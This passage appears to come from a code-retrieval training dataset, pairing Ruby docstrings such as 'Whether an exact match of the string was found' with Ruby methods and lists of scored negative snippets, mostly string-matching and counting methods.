] | 0.8423245 | 0 |
This method is accessible for testing only. | def configure_canonical(canonical_flag_type, canonical_value_type,
canonical_value_label, canonical_value_delim)
return unless flag_type.nil?
@flag_type = canonical_flag_type
return unless canonical_flag_type == :value
@value_type = canonical_value_type
canonical_value_delim = "" if canonical_value_delim == "=" && flag_style == :short
canonical_value_delim = "=" if canonical_value_delim == "" && flag_style == :long
@value_delim = canonical_value_delim
@value_label = canonical_value_label
label = @value_type == :optional ? "[#{@value_label}]" : @value_label
@canonical_str = "#{str_without_value}#{@value_delim}#{label}"
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def private; end",
"def private_method\n end",
"def refutal()\n end",
"def specie; end",
"def specie; end",
"def specie; end",
"def specie; end",
"def spec; end",
"def spec; end",
"def before_setup; end",
"def implementation; end",
"def implementation; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def internal; end",
"def before_run; end",
"def used?; end",
"def ready; end",
"def ready; end",
"def self_test; end",
"def self_test; end",
"def pausable; end",
"def __dummy_test__\n end",
"def setup\n \n end",
"def setup\n \n end",
"def setup\n \n end",
"def setup\n \n end",
"def setup\n \n end",
"def setup\n \n end",
"def setup\n \n end",
"def schubert; end",
"def weber; end",
"def setup\n\n end",
"def setup\n\n end",
"def setup\n\n end",
"def testing\n # ...\n end",
"def init\n\n end",
"def initialize\n\n end",
"def initialize\n\n end",
"def strategy; end",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def driver; end",
"def isolated; end",
"def isolated; end",
"def internal?; end",
"def probers; end",
"def setup\n # override this if needed\n end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def at_init\n\n\t\tend",
"def initialize\n super()\n end",
"def setup\n end",
"def setup\n end",
"def setup\n end",
"def setup\n end",
"def setup\n end",
"def setup\n end",
"def initialize\r\n\r\n end",
"def initialize()\r\n\r\n end",
"def init; end",
"def init; end",
"def init; end",
"def init; end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def protected_method\n end",
"def handle; end",
"def initialize\n super\n end"
] | [
"0.7710882",
"0.6613679",
"0.63352877",
"0.62930155",
"0.62930155",
"0.62930155",
"0.62930155",
"0.62759215",
"0.62759215",
"0.6206897",
"0.6175529",
"0.6175529",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.6165245",
"0.6058807",
"0.60150236",
"0.5943375",
"0.5943375",
"0.59427243",
"0.59427243",
"0.59319127",
"0.59117156",
"0.59035534",
"0.59035534",
"0.59035534",
"0.59035534",
"0.59035534",
"0.59035534",
"0.59035534",
"0.5895585",
"0.5880138",
"0.58627087",
"0.58627087",
"0.58627087",
"0.58498514",
"0.5841898",
"0.5841274",
"0.5841274",
"0.58408105",
"0.5821093",
"0.5821093",
"0.5812179",
"0.58024734",
"0.58024734",
"0.5794532",
"0.5792814",
"0.5782811",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.57722557",
"0.5771002",
"0.5770548",
"0.5770548",
"0.5770548",
"0.5770548",
"0.5770548",
"0.5770548",
"0.57502383",
"0.5747836",
"0.5726744",
"0.5726744",
"0.5726744",
"0.5726744",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57138073",
"0.5708527",
"0.5706904"
] | 0.0 | -1 |
Whether an exact match of the string was found | def found_exact?
@found_exact
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def matched?(str)\r\n # puts \">>> #{self.matcher.source}\"\r\n # puts \">>> #{str}\"\r\n return false if (!self.implicit && str[0] != \"!\")\r\n if (self.matcher =~ str) != nil\r\n $bot.last_match = $~\r\n $log.info(\"/#{self.matcher.source}/ matched #{str}\")\r\n return true\r\n end\r\n false\r\n end",
"def exact_match?\n search_settings = @settings['search']\n matching = search_settings.fetch('matching', 'pattern').normalize_matching\n matching == :exact\n end",
"def match? re, str\n re.match(str) != nil\n end",
"def ismatch(string)\n (string =~ @pattern) ? true : false\n end",
"def match?(str)\n !!(str =~ @regex)\n end",
"def match?(str)\n !!(str =~ @regex)\n end",
"def exact_match?\n !partial_match?\n end",
"def match? string\n match = false\n patterns.each{|p|\n p string, p, \"===\"\n if string =~ Regexp.new(p.content)\n match = true\n break\n end\n }\n return match\n end",
"def match_text text\n @lookups.each do |rx_curr|\n return true if text =~ rx_curr\n end\n false\n end",
"def exact_match?(name1:, name2:)\n return false unless name1.present? && name2.present?\n\n a = name_without_alias(name: name1.downcase)\n b = name_without_alias(name: name2.downcase)\n a == b\n end",
"def match?(str)\n query = query_obj(str)\n tag_query = query[:tag]\n class_query = query[:classes]\n prop_query = query[:properties]\n\n (tag_query.blank? || match_tag?( tag_query )) &&\n (class_query.blank? || match_class?( class_query )) &&\n (prop_query.blank? || match_prop?( prop_query ))\n end",
"def matching?(word_to_match)\n anagram?(word_to_match) && !words_the_same?(word_to_match)\n end",
"def match_a_b?(string)\n if /b/.match(string)\n puts \"we have a match\"\n else \n puts \"no match at all\"\n end\nend",
"def matches?(str1, str2)\n str1.start_with?(str2) || str2.start_with?(str1)\n end",
"def has_a_b?(string)\n if string =~ /b/\n puts \"MATCH!\"\n else\n puts \"No Match here!\"\n end\nend",
"def match? str, name\n rule = rule(name)\n raise \"no such rule: #{name.inspect}\" unless rule\n rest = rule.match? str\n return false unless rest && rest.empty?\n true\n end",
"def match?(name, literal) true end",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def has_lab?(string)\n if /lab/i =~ string\n puts string\n else\n puts \"Not a match!\"\n end\nend",
"def matches? (search)\n if (search.nil? || search == \"\")\n return true\n end\n search = search.gsub(/[^0-9a-z ]/i, '').downcase\n searches = search.split(' ')\n \n searches.each do |word|\n word += ' '\n title = self.title.nil? ? ' ' : self.title.gsub(/[^0-9a-z ]/i, '').downcase + ' '\n description = self.description.nil? ? ' ' : self.description.gsub(/[^0-9a-z ]/i, '').downcase + ' '\n venue_name = self.venue.name.nil? ? ' ' : self.venue.name.gsub(/[^0-9a-z ]/i, '').downcase + ' '\n if !(title.include?(word) || description.include?(word) || venue_name.include?(word))\n return false\n end\n end\n\n return true\n end",
"def matches?(pattern); end",
"def exact_matches(search_word, string)\n regexp = Regexp.new(Regexp.escape(search_word), \"i\")\n return (string.scan(regexp) || []).length\n end",
"def has_a_b?(string)\n if string =~ /b/\n puts \"We have a match!\"\n else \n puts \"No match here.\"\n end\nend",
"def has_a_b?(string)\n if string =~ /b/\n puts 'We have a match!'\n else\n puts 'No match here.'\n end\nend",
"def has_a_b?(string)\n if string =~ /b/\n puts \"We have a match!\"\n else\n puts \"No match here.\"\n end\nend",
"def has_a_b?(string)\n if string =~ /b/\n puts \"We have a match!\"\n else\n puts \"No match here.\"\n end\nend",
"def match?(content)\n self.match.present? && content =~ /#{self.match}/\n end",
"def contained?(regexp)\n strings.find{ |x| x =~ regexp }\n end",
"def str_include?(str, target_str)\n tmp = target_str.downcase\n if !!str.match(/#{tmp}/i)\n return true\n else\n return false\n end\n end",
"def matches?(input)\n !!(regexp =~ input)\n end",
"def is? str\n !!match(str)\n end",
"def has_a_b?(string)\n if /b/.match(string)\n puts 'We have a match!'\n else\n puts 'No match here.'\n end\nend",
"def is_match(s, p)\n\treturn true if s == p\n\treturn true if s == \"*\" || p == \"*\"\n\tif s.length == p.length\n\t\tbooleans = []\n\t\ti = 0\n\t\twhile s.length > i\n\t\t\tbooleans << (s[i] == \"?\" || p[i] == \"?\" || s[i] == p[i])\n\t\t\ti += 1\n\t\tend\n\t\tbooleans.each do |statement|\n\t\t\treturn true if statement\n\t\tend\n\tend\n\tfalse\nend",
"def match_text(text, expected)\n unless text.match(/#{expected}/).nil?\n text.match(/#{expected}/)[0].to_s\n end\n\n false\n end",
"def article_match? (query, article_title)\n found = false\n return true if query.empty?\n temp_article = article_title.downcase\n query.each do |kw|\n pattern = Regexp.new /.*#{kw.downcase}.*/\n found = true if temp_article =~ pattern\n end\n found\nend",
"def matching_exactly_one_word\n /WRITE ME/\n end",
"def has_a_b?(string)\n\tif /b/.match(string)\n\t\tputs \"We have a match!\"\n\telse\n\t\tputs \"No match here.\"\n\tend\nend",
"def has_a_b?(string)\r\n if /b/.match(string) # =~ with /char/ you are looking for or .match is regex\r\n puts \"We have a match!\"\r\n else\r\n puts \"No match here.\"\r\n end\r\nend",
"def match?(string,number)\n\t\tmatch = string.match(@line[:regex])\n\t\tmatch ? process_match(match,number) : false\n\tend",
"def matches?(input_string)\n @word_list.include? input_string\n end",
"def has_a_b?(string)\n\tif string =~ /b/\n\t\tputs \"We have a match!\"\n\telse\n\t\tputs \"No match here.\"\n\tend\nend",
"def match?(name); end",
"def check_str(str,s)\n if str.include?s\n puts \"true\"\n else\n puts \"false\"\n end\nend",
"def textmatch(text, terms)\n terms.all? { |term| text =~ /#{term}/i }\nend",
"def contains?(word)\n if word.length > 0\n if /lab/ =~ word\n puts \"#{word} contains the string 'lab'\"\n else\n puts \"Not in that word.\"\n end\n else\n puts \"Please specify a word.\"\n end\nend",
"def apply?(str)\n !!(regexp.match(str))\n end",
"def matches?(value)\n !!(value.to_s =~ MATCHER)\n end",
"def has_a_b?(word)\n if /b/.match(word)\n puts 'We have a match'\n else\n puts 'No match here...'\n end\nend",
"def has_lab?(word)\n if /lab/.match(word)\n puts word\n else\n puts \"No match here.\"\n end\nend",
"def matches?(ref_name)\n return false if @ref_name_or_pattern.blank?\n\n exact_match?(ref_name) || wildcard_match?(ref_name)\n end",
"def valid?(string)\n r = Regexp.new(@matcher)\n \n !(string =~ r).nil?\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def check_in(word)\n if /lab/ =~ word\n puts word\n else\n puts \"No match\"\n end\nend",
"def check_in(word)\n if /lab/ =~ word\n puts word\n else\n puts \"No match\"\n end\nend",
"def check_in(word)\n if /lab/ =~ word\n puts word\n else\n puts \"No match\"\n end\nend",
"def include?(searchstring, substring)\n\nend",
"def check_string( str )\r\n result = false\r\n return result unless validate_string(str)\r\n\r\n if str.include?( self.pattern )\r\n result = true\r\n end\r\n return result\r\n end",
"def match?(string)\n bigrams = get_bigrams(string)\n while bigrams.length > 1\n pair = bigrams.shift\n return true if bigrams[1..-1].include?(pair)\n end\nend",
"def match?(str, regex)\n if regex.nil? || regex.empty?\n return (str.nil? || str.empty?)\n end\n\n if !str.nil? && !str.empty? && [str[0], \".\"].include?(regex[0])\n first_matches = true\n else\n first_matches = false\n end\n\n if regex.length > 1 && regex[1] == \"*\"\n return match?(str, regex[2..-1]) || (first_matches && match?(str[1..-1], regex))\n else\n return first_matches && match?(str[1..-1], regex[1..-1])\n end\nend",
"def check(word)\n if /lab/ =~ word\n puts word\n else\n puts \"No Match!\"\n end \nend",
"def =~(string)\n to_re =~ string.to_str\n end",
"def match(other)\n String.new(self).match other\n end",
"def found_match(str)\n\tif dictionary.include?(str) # returns true if found in the dictionary\n\t\treturn str # don't stop the recursion, but return the word ?\n\tend\n\tfalse\nend",
"def substring?(long_string, short_string)\n\n long_string.match(short_string) != nil\n\nend",
"def string_value?(value)\n string = value.to_s\n [NonWordMatcher, KeywordMatcher].any? { |matcher|\n matcher.match string\n }\n end",
"def match?(input)\n input.casecmp(command_text).zero?\n end",
"def maybe_matching(ingredient_long_name,item)\n return (item.downcase.split(\" \") & ingredient_long_name.split(\" \")).size >= 1\nend",
"def custom_start_with?(string, substring)\n array_of_strings = string.split(\" \")\n array_of_strings.first == substring ? true : false\nend",
"def string_matches_pattern(pattern, string)\n case pattern\n when Regexp\n pattern === node['string']\n when String\n string.include?(pattern)\n end\nend",
"def custom_include?(str, substr)\n # return true if substring is found anywhere\n # within the string. Return false otherwise.\n len = substr.length\n str.chars.each_with_index do |char, idx|\n return true if str[idx, len] == substr\n end\n false\nend",
"def exact_match(user_word)\n @loader.arr.each do |word|\n return word if word == user_word\n end\n end",
"def exact_match_string\n @matches.nil? ? nil : @matches[0]\n end",
"def exact_match?(arguments, keyword_arguments)\n definition.exact_match?(arguments, keyword_arguments)\n end",
"def check_in(word)\n if /lab/i =~ word # regex with \"i\" for case insensitive.\n puts word\n else\n puts \"Not present.\" \n end\nend",
"def matches?\n symbol = @actual.is_a?(Symbol)\n actual = symbol ? @actual.to_s : @actual\n values = symbol ? @values.map { |v| v.is_a?(Symbol) ? v.to_s : v } : @values\n\n values.each do |value|\n return false unless actual.include?(value)\n end\n\n true\n end",
"def lab_check(word)\n if /lab/ =~ word\n puts word\n else\n puts \"no match\"\n end\nend",
"def match?(value)\n if regex?\n return true if name =~ value.to_s\n else\n return(name == convert(value) ? true : @aliases.include?(convert(value)))\n end\n end",
"def match?(value)\n if regex?\n return true if name =~ value.to_s\n else\n return(name == convert(value) ? true : @aliases.include?(convert(value)))\n end\n end",
"def exact?\n @exact\n end",
"def match?(given_names); end",
"def test_string_match\n s = \"a\"\n assert_equal(0, string_match(\"a\", s))\n assert_equal(0, string_match(/a/, s))\n assert_equal(0, string_match('\\(a\\|\\b\\)', s))\n assert_equal(0, string_match(/a|b/, s))\n assert_equal(0, string_match(/^a/, s))\n assert_equal(0, string_match(/a$/, s))\n assert_equal(0, string_match(/.*/, s))\n assert_equal(nil, string_match(/not-match/, s))\n \n end",
"def name_matches?(name, match)\n if match.include? '*'\n parts = match.split '*'\n first = parts.shift\n\n # if it's a leading *, this works because start_with?(\"\") always returns true\n # and has a length of 0 so the position stays at 0, which is correct\n if name.start_with?(first)\n # check for suffix match right away, accounting for a final * which split doesn't return\n if not match.end_with? '*' and not name.end_with?(parts.pop)\n return false\n end\n\n # check any internal wildcards\n position = first.length\n parts.each do |p|\n # find the substring starting at the position end of the last match\n found = name.index(p, position)\n if found and found >= position\n position = found + p.length # end of the matched substr\n else\n return false\n end\n end\n end\n elsif name == match\n true\n end\n end",
"def has_lab?(string)\n if string.downcase =~ /lab/\n puts \"#{string} includes the word lab.\"\n else\n puts \"#{string} does not include the word lab\"\n end\nend",
"def match?(pattern)\n pattern.split.each_with_index do |arg, index|\n return false unless arg == self[index]\n end\n return true\n end",
"def find?(word)\n !find(word).empty?\n end",
"def check_in(word)\n\tif /lab/ =~ word\n\t\tputs word\n\telse\n\t\tputs \"No match\"\n\tend\nend",
"def contains_any(str, fragments)\r\n return false unless Regexp.union(fragments) =~ str\r\n true\r\n end"
] | [
"0.7639058",
"0.7596726",
"0.7488582",
"0.746375",
"0.74020594",
"0.74020594",
"0.7239832",
"0.71905303",
"0.7163009",
"0.714809",
"0.7112216",
"0.70170546",
"0.70159245",
"0.70122075",
"0.7001217",
"0.69997746",
"0.697129",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.696923",
"0.69289",
"0.6923522",
"0.68781143",
"0.68673676",
"0.6859612",
"0.68549395",
"0.6850278",
"0.6850278",
"0.68394494",
"0.6833291",
"0.6822109",
"0.68205667",
"0.6807489",
"0.68073195",
"0.6790686",
"0.6759885",
"0.6744091",
"0.6721982",
"0.6713113",
"0.67117286",
"0.6710488",
"0.6700137",
"0.66967916",
"0.669024",
"0.6684523",
"0.66705805",
"0.6669873",
"0.6668454",
"0.6666751",
"0.6660378",
"0.66503567",
"0.66344243",
"0.66271466",
"0.66239303",
"0.66239303",
"0.66176337",
"0.66176337",
"0.66176337",
"0.66005373",
"0.65911955",
"0.65866894",
"0.6583588",
"0.65799606",
"0.656111",
"0.6548577",
"0.65473306",
"0.6547204",
"0.6542767",
"0.6515532",
"0.6511743",
"0.6507482",
"0.6505852",
"0.64800584",
"0.64768535",
"0.6473542",
"0.64732516",
"0.64723617",
"0.6470017",
"0.6466353",
"0.64658916",
"0.64658916",
"0.6450653",
"0.64474833",
"0.6429299",
"0.6427048",
"0.64261234",
"0.6425263",
"0.6421192",
"0.64141256",
"0.64077866"
] | 0.6872769 | 33 |
The number of matches that were found. | def count
@flags.size
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def matched_count\n @results[MATCHED_COUNT]\n end",
"def return_count\n return @matchedCount\n end",
"def matched_size\n m = @match\n m.to_s.size if (not m.equal?(nil))\n end",
"def count\n Jhead.call(\"-c\", @match, @pattern).split(\"\\n\").size\n end",
"def exact_match_count\n (0..3).inject(0) do |count, index|\n count + (exact_match?(index) ? 1 : 0)\n end\n end",
"def total_matches_played\n count = 0\n\n matches.each do |match|\n unless match.finalized_date == nil \n count += 1\n end\n end\n\n count\n end",
"def count\n # There are two occurrences, but they are the same\n total = first locator(:total)\n return total.text.to_i if total\n results? ? raise(RuntimeError, \"Couldn't determine result count\", caller) : 0\n end",
"def total_count #:nodoc:\n total == 1 && !@group.nil? && @group['matches'] > 1 ? @group['matches'] : total\n end",
"def num_found\n\n if @solr_response[\"response\"] != nil\n # Normal Solr query\n return @solr_response[\"response\"][\"numFound\"]\n end\n\n if @solr_response[\"grouped\"] != nil\n # Grouped Solr query.\n total = 0\n @solr_response[\"grouped\"].keys.each do |key|\n total += @solr_response[\"grouped\"][key][\"matches\"]\n end\n return total\n end\n\n return 0\n rescue\n 0\n end",
"def num_exact_matches(code)\n matches = 0\n @pegs.each_with_index {|peg, i| matches += 1 if peg == code[i] }\n return matches\n end",
"def word_count\n @tried_solutions.length\n end",
"def matchedsize\n warn \"StringScanner#matchedsize is obsolete; use #matched_size instead\" if $VERBOSE\n matched_size\n end",
"def num_near_matches(guess)\n counter = 0\n guess.pegs.each { |peg| counter += 1 if @pegs.include?(peg) }\n counter - num_exact_matches(guess)\n end",
"def total\n #use group matches instead of numFound for grouped response\n if response[:numFound].nil? \n self[:grouped][blacklight_config['index']['group']]['matches'].to_s.to_i \n else \n response[:numFound].to_s.to_i\n end\n end",
"def all_hits_count\n return @all_results.length || 0\n end",
"def count\n Integer(parsed_body['meta']['total_results'])\n end",
"def hit_count()\n #This is a stub, used for indexing\n end",
"def number_of_results(results)\n printf(\"\\n%<results>d results found.\\n\\n\", results: results.length)\n end",
"def num_matches\n count = 0\n other_answers.each do |a|\n count += 1 if base_answer.food_groups == a.food_groups\n end\n count\n end",
"def filtered_hits_count\n return @filtered_results.length || 0\n end",
"def count_duplicate_matches(matches)\n matches.map { |match| matches_hash[Set.new match] }.reduce(0, :+)\n end",
"def count\n size = 0\n core_search.group(\"name.id, #{main_group_by_columns}\").each do |_x|\n size += 1\n end\n size\n end",
"def test_size\n @results.map {|node_name, classes|\n classes.size\n }.reduce(:+) || 0\n end",
"def length; return @results.length; end",
"def num_results(_args = {})\n @num_results ||= result_ids&.count || 0\n end",
"def num_hits; @hits.size; end",
"def num_hits; @hits.size; end",
"def num_hits; @hits.size; end",
"def _match_count (substr, text)\n return 0 if (!text || !substr)\n\n count = 0\n offset = 0\n while (result = text.index(substr, offset))\n count += 1\n offset = result + 1\n end\n count\n end",
"def num_near_matches(guess_object)\n pegs = guess_object.pegs\n count = 0\n pegs.each_with_index do |char, i|\n count += 1 if @pegs.include?(char) && char != @pegs[i]\n end\n count\n end",
"def num_exact_matches(code)\n self.pegs.zip(code.pegs).count { |(a,b)| a == b }\n end",
"def size\n @set['includedResults'].to_i\n end",
"def inc_match\n @matchedCount += 1\n end",
"def max_matches\n @max_matches || 1000\n end",
"def length\n @results_list.count\n end",
"def count_matches( n )\n i = 1\n p = n\n while p.to_s.size == i\n p *= n\n i += 1\n end\n i - 1\n end",
"def count\n raw_history['num_results']\n end",
"def update_total_matches\n self.correct_matches = (maker.code.select.with_index { |v, i| v == breaker.guess[i] }).length\n self.matches = 4 - (maker.code - breaker.guess).length - correct_matches\n end",
"def count\n each.size\n end",
"def exact_matches(other_code)\n num_matches = 0\n self.pegs.each_with_index do |code, index|\n if(code == other_code[index])\n num_matches += 1\n end\n end\n num_matches\n end",
"def count()\n @list_of_positions.length\n end",
"def count\n self.at('/RETS/COUNT')['Records'].to_i\n end",
"def returned_count\n reply.documents.length\n end",
"def result_count\n result_ids.size\n end",
"def matcher(match)\n match = match.flatten.uniq\n match.each do |m|\n @counter.count(m)\n end\n end",
"def total\n response[:numFound].to_s.to_i\n end",
"def count\n self.wordcounts.map(&:count).inject(0, :+)\n end",
"def top_hits_count\n return @top_results.length || 0\n end",
"def count\n cnt = 0\n begin\n if block_given?\n scanner = htable.getScanner(filtered_scan)\n scanner.each do |result|\n cnt += 1 if yield(Result.send(:new, result))\n end\n else\n scanner = htable.getScanner(filtered_scan_minimum)\n scanner.each { cnt += 1 }\n end\n ensure\n scanner.close if scanner\n end\n cnt\n end",
"def occurences_count\n\t\t\t\t\t\tHash.new(0).tap do |result|\n\t\t\t\t\t\t each { |item| result[item] += 1 }\n\t\t\t\t\t\tend\n\t\t\t\tend",
"def count\n to_a.size\n end",
"def count\n to_a.size\n end",
"def exact_matches\n matches = 0\n 4.times{ |x| matches += 1 if @num_guess[x] == @code[x] }\n matches\n end",
"def calculate_total_predictions(match)\n match.predictions.count.to_f\n end",
"def count\n each.count\n end",
"def count\n all.size\n end",
"def word_count\n return words.size\n end",
"def node_size\n @results.size\n end",
"def move_count; @move_count ||= match.moves.count; end",
"def get_total_games_played\n return games.size\n end",
"def total_results\n numberOfRecords\n end",
"def total_results\n numberOfRecords\n end",
"def count\n @target.count.to_i\n end",
"def record_count\n pair = text_blocks.each_cons(2)\n .select { |cons| cons[1] == \"Record Count:\" }.first\n pair && pair[0].to_i\n end",
"def count\n values.inject(0){|m, v| m + v.length}\n end",
"def num_researched\n @num_researched ||= worth_counting { count_researched }\nend",
"def size\n @size ||= search.size\n end",
"def games_played\n self.results.to_a.count\n end",
"def length; count end",
"def count\n @words.length\n end",
"def hit_count\n item_hash.deep_find(:hit_count, 0)\n end",
"def num_matches_in_file(fname, match_regexp)\n\n num_lines_per_batch = 5000\n\n num_matched = 0\n\n if File.exist? fname\n File.open(fname, \"r\") do |f|\n\n # use an enumerator to read just (num_lines_per_batch) lines at a time\n f.lazy.each_slice(num_lines_per_batch) do |lines|\n\n num_matched += lines.select { |line| line.match(match_regexp) }.count\n\n end\n\n end\n else\n num_matched = 0\n end\n\n num_matched\n end",
"def count\n index.length\n end",
"def numberOfResults\n @@numberOfResults\n end",
"def played_matchs_season(round, season = nil)\n count = 0\n matchs = find_matchs(round, season)\n\n matchs.each do |match|\n if match.finished?\n count += 1\n end\n end\n count\n end",
"def total\n @doclist['numFound']\n end",
"def total_hits_count\n return top_hits_count + all_hits_count\n end",
"def count(data)\n return data.length\n end",
"def count_matcher submatcher, method\n lambda do |string, index = 0, counts:|\n result = submatcher.call(string, index, counts: counts)\n\n if !Matchers.match?(result) || result.size.send(method, counts[result.name])\n result\n end\n end\n end",
"def get_total_games_played\n\t\treturn games.size\n\tend",
"def count\n @count ||= @query.count\n end",
"def length\n each.count\n end",
"def count\n @rules.size\n end",
"def hit_count\n self[:hit_count] && self[:hit_count].to_i\n end",
"def count_passing\n return self.passing_tests.size\n end",
"def total_count\n @all.size\n end",
"def find_counts()\n # Search through given fields for given text\n counts = Array.new\n find_text = @replace['replace']['find']\n @replace['replace']['tables'].each do |table, fields|\n query = find_query(find_text, table, fields.clone)\n @dbconn.query(query).each do |row|\n count_hash = {table: table, fields: fields, count: row['total']}\n counts.push count_hash\n end\n end\n counts\n end",
"def number_returned; 0; end",
"def count\n @mutex.synchronize { @count }\n end",
"def returned_nodes_count\n @traversal_position.returnedNodesCount\n end",
"def count_failing\n return self.failing_tests.size\n end",
"def count( query )\n data = index_request({ \"q\" => query })\n return data[\"response\"][\"numFound\"]\n end",
"def length\n @results.keys.length\n end",
"def count \n puts \"Tu as scrappé #{@result_scrap.count} élémént(s)\"\n return @result_scrap.count\n end",
"def num_possible\n return -1 if filled?\n\n @possible.size\n end",
"def getCount()\r\n available = @emojiFiles.size()\r\n used = @usedEmojis.size()\r\n return available, used\r\n end",
"def calculate\n @text.scan(\"#{@keyword}\").size\n end",
"def count\n @count\n end",
"def total_count()\n @raw_data.size\n end",
"def size\n @obj['results'].length\n end",
"def count\n all.count\n end"
] | [
"0.8698235",
"0.8089367",
"0.7729435",
"0.7666182",
"0.765437",
"0.75609905",
"0.7497716",
"0.74399954",
"0.73002255",
"0.70184815",
"0.7002051",
"0.6974099",
"0.6907366",
"0.6902071",
"0.6899067",
"0.6891406",
"0.6891183",
"0.68873537",
"0.6886565",
"0.6863194",
"0.6807652",
"0.67606825",
"0.6711681",
"0.67105836",
"0.6680861",
"0.66764474",
"0.66764474",
"0.66764474",
"0.666679",
"0.6662732",
"0.6629963",
"0.6624765",
"0.6615171",
"0.660899",
"0.66016805",
"0.6571134",
"0.6570022",
"0.65629655",
"0.6561363",
"0.65400916",
"0.6532567",
"0.65159816",
"0.6509116",
"0.6498328",
"0.64960164",
"0.64872324",
"0.6483369",
"0.64520776",
"0.6449919",
"0.6445698",
"0.6435145",
"0.6435145",
"0.6421304",
"0.640867",
"0.63856834",
"0.63824034",
"0.6381493",
"0.6359284",
"0.6344597",
"0.63416445",
"0.63403136",
"0.63403136",
"0.63383806",
"0.6330344",
"0.63287896",
"0.63208705",
"0.63201076",
"0.63076025",
"0.63065904",
"0.6295503",
"0.62942123",
"0.6282745",
"0.62645584",
"0.62640274",
"0.62582844",
"0.6254444",
"0.6240366",
"0.62345284",
"0.62343097",
"0.6229755",
"0.6228348",
"0.62235403",
"0.6222981",
"0.6221404",
"0.6221378",
"0.6220951",
"0.62104833",
"0.6209806",
"0.6207021",
"0.6184694",
"0.6176302",
"0.61745906",
"0.6173244",
"0.6170728",
"0.61649007",
"0.6160374",
"0.6157427",
"0.6154779",
"0.615333",
"0.61488646",
"0.61477846"
] | 0.0 | -1 |
Whether a single unique match was found. | def found_unique?
@flags.size == 1
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def match?\n false\n end",
"def one_result\n matched_combined = @matched_names.ids + @matched_tags.ids +\n @matched_queries.ids + @matched_creator.ids +\n @matched_modifier.ids\n return Asq.find(matched_combined[0]) if matched_combined.length == 1\n false\n end",
"def found_exact?\n @found_exact\n end",
"def matched?\n !failed?\n end",
"def unique?(name)\n tgts = resolve_mapping(name)\n targets = tgts.is_a?(Array) ? tgts : find(tgts)\n targets.size == 1\n end",
"def unique?\n !! @unique\n end",
"def matched?\n not @match.equal?(nil)\n end",
"def unique?\n if defined?(@unique)\n @unique\n else\n true\n end\n end",
"def unique?\n return @data[\"unique\"]==true\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def what_is_unique?\n cache_options[:unique].to_s =~ /true|false/\n end",
"def partial_match?\n @json['results'][0]['partial_match'] == true\n end",
"def mapsUnique?()\n return false unless passed_filter?\n return false if unmapped_Ns? || unmapped?\n if @chrom =~ /^\\d+:\\d+:\\d+$/\n false\n else\n true\n end\n end",
"def one?\n result.equal?(:one)\n end",
"def match\n true\n end",
"def found?\n\t\t\t!!@found\n\t\tend",
"def is_matched(ind)\n\t\treturn @tile_Array[ind].return_match\n\tend",
"def exact_match?\n !partial_match?\n end",
"def same?\n similarities.size == 1 && similarities.first.distance.zero? # The same\n end",
"def check_unique\n bar = Bar.where(:name => self.name, :user_id => self.user_id)\n if bar != nil\n \treturn false\n end\n end",
"def find?\n find_duplicate.nil?\n end",
"def found?\n return false if no_search\n\n id.present? || records.present?\n end",
"def unique?\n if @data.fetch(:Index_type) == \"UNIQUE\" || @data.fetch(:Non_unique).to_i == 0\n return true\n else\n return false\n end\n end",
"def terminal?\n matches.length == 0\n end",
"def includedOnce(haystack, needle)\n \n counter = haystack.count { |x| x == needle}\n if counter == 1\n return true\n elsif counter > 1\n return false\n else\n return false\n end\n \nend",
"def is_unique?(str)\n\nend",
